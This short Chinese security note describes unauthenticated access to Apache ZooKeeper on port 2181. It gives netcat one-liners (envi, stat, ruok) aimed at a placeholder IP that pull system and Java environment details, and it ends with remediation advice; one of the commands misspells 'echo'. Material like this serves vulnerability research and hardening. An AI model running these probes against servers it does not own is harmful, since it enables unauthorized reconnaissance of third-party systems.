Zookeeper未授权访问漏洞利用

Zookeeper未授权访问漏洞利用

1.漏洞介绍

ZooKeeper是一个分布式的，开放源码的分布式应用程序协调服务，是Google的Chubby一个开源的实现，是Hadoop和Hbase的重要组件。它是一个为分布式应用提供一致性服务的软件，提供的功能包括：配置维护、域名服务、分布式同步、组服务等。
ZooKeeper默认开启在2181端口，在未进行任何访问控制情况下，攻击者可通过执行envi命令获得系统大量的敏感信息，包括系统名称、Java环境。

在漏洞挖掘过程中碰到，于是记录下来

2.漏洞利用

使用NC连接，并执行 envi 获取敏感信息

ehco envi | nc xxx.xxx.xxx.xxx 2181

stat：列出关于性能和连接的客户端的统计信息。
echo stat |nc xxx.xxx.xxx.xxx 2181

ruok：测试服务器是否运行在非错误状态。
echo ruok |nc xxx.xxx.xxx.xxx 2181

reqs：列出未完成的请求
envi：打印有关服务环境的详细信息
dump：列出未完成的会话和临时节点

3.修复方式

禁止把Zookeeper直接暴露在公网
添加访问控制，根据情况选择对应方式（认证用户，用户名密码，指定IP）